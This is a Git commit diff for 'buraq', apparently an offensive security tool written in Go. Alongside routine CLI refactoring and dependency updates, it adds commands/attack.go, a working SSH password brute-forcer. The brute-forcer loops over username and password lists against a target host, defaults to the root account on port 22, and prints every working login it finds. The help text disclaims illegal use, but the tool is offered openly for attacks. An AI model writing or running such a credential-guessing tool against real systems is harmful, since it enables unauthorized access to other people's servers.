Implementing attack command for buraq (#4)

* Added a simple yet effective way to execute CLI commands

* Moving 'clean' and 'repair' to commands/

* Added simple function to check if provided credentials are valid/work

* Simplified the CLIs working

* Updated sum and mod files

* Adding missing go get commands

* Finally added the bruteforcing program, need to integrate with main binary

* Completed implementation of attack and fixed minor bugs

Co-authored-by: NovusEdge <novusedge@gmail.com>

Author: NovusEdge

buraq.go

@@ -16,26 +16,90 @@ import (
 	"log"
 	"os"
 	"os/exec"
+	"path/filepath"
 
+	src "github.com/NovusEdge/buraq/src"
 	utils "github.com/NovusEdge/buraq/utils"
 )
 
 // ENV is the environment variables for the program
 var ENV = utils.GetEnv()
 
 func main() {
-	// Checking if no commands are passed in and if the binary is simply being called...
-	if len(os.Args) < 2 {
-		var out bytes.Buffer
-		cmd := exec.Command(fmt.Sprintf("%s/cmdbin/help", ENV["BURAQROOT"]))
-		cmd.Stdout = &out
-
-		err := cmd.Run()
-		if err != nil {
-			log.Fatal(err)
-		}
+	checkCommand(os.Args)
+	executeCommand(os.Args)
+}
 
-		fmt.Print(out.String())
+func checkCommand(args []string) {
+	var ok bool
+	if len(args) < 2 {
+		help()
 		os.Exit(0)
 	}
+
+	cmd := args[1]
+	for _, c := range src.ValidCommands() {
+		if cmd == c {
+			ok = true
+		}
+	}
+
+	if !ok {
+		fmt.Println(utils.ColorIt(utils.ColorRed, "[E]: Invalid command!\nUse \"buraq help\" to show the usage for buraq."))
+		os.Exit(1)
+	}
+
+}
+
+func executeCommand(args []string) {
+	var cmd *exec.Cmd
+	var out bytes.Buffer
+
+	command := args[1]
+	commandString := filepath.Join(ENV["BURAQCMDBIN"], command)
+
+	if len(args) > 1 {
+		cmd = exec.Command(commandString, args[2:]...)
+	} else {
+		cmd = exec.Command(commandString, args...)
+	}
+
+	cmd.Stdout = &out
+	err := cmd.Run()
+
+	if err != nil {
+		log.Fatal(err)
+		os.Exit(1)
+	}
+	if s := out.String(); s != "" {
+		fmt.Println(s)
+	}
+}
+
+func env() {
+	var out bytes.Buffer
+	cmd := exec.Command(fmt.Sprintf("%s/env", ENV["BURAQCMDBIN"]))
+	cmd.Stdout = &out
+
+	err := cmd.Run()
+
+	if err != nil {
+		log.Fatal(err)
+	}
+
+	fmt.Println(out.String())
+}
+
+func help() {
+	var out bytes.Buffer
+	cmd := exec.Command(fmt.Sprintf("%s/help", ENV["BURAQCMDBIN"]))
+	cmd.Stdout = &out
+
+	err := cmd.Run()
+
+	if err != nil {
+		log.Fatal(err)
+	}
+
+	fmt.Println(out.String())
 }

commands/attack.go

@@ -0,0 +1,108 @@
+package main
+
+/*
+// Author: Aliasgar Khimani (NovusEdge)
+// Project: github.com/NovusEdge/buraq
+//
+// Copyright: GNU General Public License v3.0
+// See the LICENSE file for more info.
+//
+// All Rights Reserved
+*/
+
+import (
+	"flag"
+	"fmt"
+	"io/ioutil"
+	"log"
+	"os"
+	"strings"
+	"sync"
+	"time"
+
+	src "github.com/NovusEdge/buraq/src"
+	utils "github.com/NovusEdge/buraq/utils"
+)
+
+func main() {
+	flag.Usage = func() {
+		fmt.Println(src.CommandAttackHelp)
+	}
+
+	if len(os.Args) < 2 {
+		fmt.Println(utils.ColorIt(utils.ColorYellow, "[!]: No options provided!\nRun 'buraq help attack' for usage information."))
+		os.Exit(0)
+	}
+
+	var t int
+	var port uint
+	var user string
+	var proto string
+	var passlist string
+	var userlist string
+	var timeout time.Duration
+
+	flag.UintVar(&port, "port", 22, "Specifies the port on which target is hosting it's ssh service")
+
+	flag.StringVar(&proto, "proto", "tcp", "Specify protocol used for the attack. (tcp/udp)")
+
+	flag.StringVar(&user, "user", "root", "Specifies the username to use for the attack.")
+	flag.StringVar(&userlist, "userlist", "", "Specifies a username-list for the attack.")
+
+	var HOME = utils.GetHomeDirectory()
+	flag.StringVar(&passlist, "passlist", HOME+"/.buraq/passlist.txt", "Specify the list of passwords to be used during the attack.")
+
+	flag.IntVar(&t, "timeout", 500, "Specifies the timeout between each attack attempt in milliseconds.")
+
+	flag.Parse()
+
+	timeout = time.Duration(t) * time.Millisecond
+	target := os.Args[len(os.Args)-1]
+
+	attack(proto, target, port, user, userlist, passlist, timeout)
+}
+
+func attack(proto string, host string, port uint, username string, userlist string, passlist string, timeout time.Duration) {
+	var wg sync.WaitGroup
+	var usernames = []string{username}
+
+	passwords := splitPasslist(passlist)
+
+	if userlist != "" {
+		content, err := ioutil.ReadFile(userlist)
+		if err != nil {
+			log.Fatal(err)
+			os.Exit(1)
+		}
+
+		usernames = append(usernames, strings.Split(string(content), "\n")...)
+	}
+
+	for _, uname := range usernames {
+		wg.Add(1)
+		go attackWithUsername(proto, host, uname, passwords, timeout, port, &wg)
+	}
+	wg.Wait()
+
+}
+
+func attackWithUsername(proto, host, username string, passlist []string, timeout time.Duration, port uint, wg *sync.WaitGroup) {
+	for _, pass := range passlist {
+		ok, _ := src.AttemptConnection(proto, username, host, pass, port, timeout)
+		if ok {
+			fmt.Println(utils.ColorIt(utils.ColorGreen, fmt.Sprintf("[+]: Found Working login:\n\tUsername: %s\n\tPassword: %s", username, pass)))
+		}
+		wg.Done()
+	}
+
+}
+
+func splitPasslist(passlist string) []string {
+	file, err := ioutil.ReadFile(passlist)
+	if err != nil {
+		log.Fatal(err)
+		os.Exit(1)
+	}
+
+	return strings.Split(string(file), "\n")
+}

tools/clean.go commands/clean.gotools/clean.go renamed to commands/clean.go

@@ -28,4 +28,13 @@ func main() {
 	for _, file := range bin {
 		os.RemoveAll(path.Join([]string{env["BURAQBIN"], file.Name()}...))
 	}
+
+	bin, err = ioutil.ReadDir(env["BURAQCMDBIN"])
+	if err != nil {
+		log.Fatal(err)
+	}
+
+	for _, file := range bin {
+		os.RemoveAll(path.Join([]string{env["BURAQCMDBIN"], file.Name()}...))
+	}
 }

commands/help.go

@@ -12,11 +12,33 @@ package main
 
 import (
 	"fmt"
+	"os"
 
 	src "github.com/NovusEdge/buraq/src"
+	utils "github.com/NovusEdge/buraq/utils"
 )
 
 func main() {
-	fmt.Println("buraq", src.Version, "(c) 2022 by Aliasgar Khimani (NovusEdge) - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).")
-	fmt.Println(src.HelpScreen)
+	if len(os.Args) < 2 {
+		fmt.Println("buraq", src.Version, "(c) 2022 by Aliasgar Khimani (NovusEdge) - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).")
+		fmt.Println(src.HelpScreen)
+	} else {
+		cmd := os.Args[1]
+		switch cmd {
+		case "help":
+			fmt.Println(src.CommandHelpHelp)
+		case "env":
+			fmt.Println(src.CommandEnvHelp)
+		case "attack":
+			fmt.Println(src.CommandAttackHelp)
+		case "version":
+			fmt.Println(src.CommandVersionHelp)
+		case "clean":
+			fmt.Println(src.CommandCleanHelp)
+		case "repair":
+			fmt.Println(src.CommandRepairHelp)
+		default:
+			fmt.Println(utils.ColorIt(utils.ColorRed, fmt.Sprintf("[E]: Invalid Command: '%s'\nPlease use 'buarq help' for usage", cmd)))
+		}
+	}
 }

commands/repair.go

@@ -0,0 +1,50 @@
+package main
+
+/*
+// Author: Aliasgar Khimani (NovusEdge)
+// Project: github.com/NovusEdge/buraq
+//
+// Copyright: GNU General Public License v3.0
+// See the LICENSE file for more info.
+//
+// All Rights Reserved
+*/
+
+import (
+	"fmt"
+	utils "github.com/NovusEdge/buraq/utils"
+	"io/ioutil"
+	"log"
+	"os"
+	"os/exec"
+)
+
+func main() {
+	env := utils.GetEnv()
+
+	// Cleaning binaries...
+	cleaningErr := exec.Command(fmt.Sprintf("%s/clean", env["BURAQCMDBIN"])).Run()
+	if cleaningErr != nil {
+		log.Fatal(cleaningErr)
+	}
+
+	// Rebuilding binaries...
+	os.Chdir(env["BURAQROOT"])
+
+	mainErr := exec.Command("go", "build", "-o", fmt.Sprintf("%s/bin/", env["BURAQROOT"]), fmt.Sprintf("%s/buraq.go", env["BURAQROOT"])).Run()
+	if mainErr != nil {
+		log.Fatal(mainErr)
+	}
+
+	cmds, err := ioutil.ReadDir(fmt.Sprintf("%s/commands", env["BURAQROOT"]))
+	if err != nil {
+		log.Fatal(err)
+	}
+
+	for _, file := range cmds {
+		err = exec.Command("go", "build", "-o", fmt.Sprintf("%s/cmdbin/", env["BURAQROOT"]), fmt.Sprintf("%s/commands/%s", env["BURAQROOT"], file.Name())).Run()
+		if err != nil {
+			log.Fatal(err)
+		}
+	}
+}

go.mod

@@ -1,3 +1,17 @@
 module github.com/NovusEdge/buraq
 
 go 1.18
+
+require (
+	github.com/schollz/progressbar v1.0.0
+	github.com/schollz/progressbar/v3 v3.8.6
+	golang.org/x/crypto v0.0.0-20220131195533-30dcbda58838
+)
+
+require (
+	github.com/mattn/go-runewidth v0.0.13 // indirect
+	github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db // indirect
+	github.com/rivo/uniseg v0.2.0 // indirect
+	golang.org/x/sys v0.0.0-20220128215802-99c3d69c2c27 // indirect
+	golang.org/x/term v0.0.0-20210927222741-03fcf44c2211 // indirect
+)

go.sum

@@ -1,32 +1,54 @@
 github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8=
 github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/k0kubun/go-ansi v0.0.0-20180517002512-3bf9e2903213/go.mod h1:vNUNkEQ1e29fT/6vq2aBdFsgNPmy8qMdSay1npru+Sw=
 github.com/kr/fs v0.1.0 h1:Jskdu9ieNAYnjxsi0LbQp1ulIKZV1LAFgK1tWhpZgl8=
 github.com/kr/fs v0.1.0/go.mod h1:FFnZGqtBN9Gxj7eW1uZ42v5BccTP0vu6NEaFoC2HwRg=
+github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94=
+github.com/mattn/go-runewidth v0.0.13 h1:lTGmDsbAYt5DmK6OnoV7EuIF1wEIFAcxld6ypU4OSgU=
+github.com/mattn/go-runewidth v0.0.13/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w=
 github.com/melbahja/goph v1.3.0 h1:RAIS7eL2tew/UrNmBpY2NZMxw6fWtOxki9nkrzw8mZY=
 github.com/melbahja/goph v1.3.0/go.mod h1:04M6J+mKmwzAOWhO0ABTweHGU3cizOp90WdCoxrn9gQ=
+github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db h1:62I3jR2EmQ4l5rM/4FEfDWcRD+abF5XlKShorW5LRoQ=
+github.com/mitchellh/colorstring v0.0.0-20190213212951-d06e56a500db/go.mod h1:l0dey0ia/Uv7NcFFVbCLtqEBQbrT4OCwCSKTEv6enCw=
 github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=
 github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
 github.com/pkg/sftp v1.13.4 h1:Lb0RYJCmgUcBgZosfoi9Y9sbl6+LJgOIgk/2Y4YjMFg=
 github.com/pkg/sftp v1.13.4/go.mod h1:LzqnAvaD5TWeNBsZpfKxSYn1MbjWwOsCIAFFJbpIsK8=
 github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
 github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/rivo/uniseg v0.2.0 h1:S1pD9weZBuJdFmowNwbpi7BJ8TNftyUImj/0WQi72jY=
+github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc=
+github.com/schollz/progressbar v1.0.0 h1:gbyFReLHDkZo8mxy/dLWMr+Mpb1MokGJ1FqCiqacjZM=
+github.com/schollz/progressbar v1.0.0/go.mod h1:/l9I7PC3L3erOuz54ghIRKUEFcosiWfLvJv+Eq26UMs=
+github.com/schollz/progressbar/v3 v3.8.6 h1:QruMUdzZ1TbEP++S1m73OqRJk20ON11m6Wqv4EoGg8c=
+github.com/schollz/progressbar/v3 v3.8.6/go.mod h1:W5IEwbJecncFGBvuEh4A7HT1nZZ6WNIL2i3qbnI0WKY=
 github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI=
 github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY=
 github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
 golang.org/x/crypto v0.0.0-20210421170649-83a5a9bb288b/go.mod h1:T9bdIzuCu7OtxOm1hfPfRQxPLYneinmdGuTeoZ9dtd4=
 golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc=
+golang.org/x/crypto v0.0.0-20220131195533-30dcbda58838 h1:71vQrMauZZhcTVK6KdYM+rklehEEwb3E+ZhaE5jrPrE=
+golang.org/x/crypto v0.0.0-20220131195533-30dcbda58838/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4=
 golang.org/x/crypto v0.0.0-20220411220226-7b82a4e95df4 h1:kUhD7nTDoI3fVd9G4ORWrbV5NY0liEs/Jg2pv5f+bBA=
 golang.org/x/crypto v0.0.0-20220411220226-7b82a4e95df4/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4=
 golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
+golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
 golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210423185535-09eb48e85fd7/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/sys v0.0.0-20211031064116-611d5d643895 h1:iaNpwpnrgL5jzWS0vCNnfa8HqzxveCFpFx3uC/X4Tps=
 golang.org/x/sys v0.0.0-20211031064116-611d5d643895/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.0.0-20220128215802-99c3d69c2c27 h1:XDXtA5hveEEV8JB2l7nhMTp3t3cHp9ZpwcdjqyEWLlo=
+golang.org/x/sys v0.0.0-20220128215802-99c3d69c2c27/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
 golang.org/x/term v0.0.0-20210927222741-03fcf44c2211 h1:JGgROgKl9N8DuW20oFS5gxc+lE67/N3FcwmBPMe7ArY=
 golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8=
 golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
+golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
 golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
 gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
 gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo=